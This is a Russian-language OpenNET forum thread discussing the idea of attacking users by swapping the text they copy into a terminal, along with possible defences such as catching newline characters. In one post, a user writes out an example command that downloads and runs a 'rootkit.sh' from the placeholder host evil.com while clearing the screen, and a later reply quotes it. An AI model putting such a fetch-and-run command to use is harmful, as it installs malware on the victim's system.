The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Концепция атаки по подмене копируемого в терминал текста с с..., opennews (??), 08-Апр-13, (0) [смотреть все] +1

Сообщения [Сортировка по времени | RSS]


22. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от GotF (ok), 08-Апр-13, 13:33 
> единственный способ защиты - встроить во все терминалы проверку при вставке текста на наличие ";" и выдавать пользователю окошко с предупреждением.

При чём тут ";"? Ловить надо перевод строки.

Ответить | Правка | Наверх | Cообщить модератору

23. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (-), 08-Апр-13, 13:55 
По уму, надо бы просто чтобы невидимый текст никуда не копировался.
Ответить | Правка | Наверх | Cообщить модератору

30. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от GotF (ok), 08-Апр-13, 14:20 
> По уму, надо бы просто чтобы невидимый текст никуда не копировался.

Ну как бы да, но беда в том, что в этих ваших интернетах есть 1001 способ сделать текст невидимым. В общем, всё как обычно сводится к прокладке между креслом и клавиатурой.

Ответить | Правка | Наверх | Cообщить модератору

25. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от cmp (ok), 08-Апр-13, 14:03 
echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh && chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear && git clone git://kernel.org
Ответить | Правка | К родителю #22 | Наверх | Cообщить модератору

29. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от GotF (ok), 08-Апр-13, 14:18 
> echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh &&
> chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear &&
> git clone git://kernel.org

Это всё чудесно, но без '\n' в нужном месте не выполнится :)

Ответить | Правка | Наверх | Cообщить модератору

38. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от gegMOPO4 (ok), 08-Апр-13, 16:30 
Ещё \r.
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру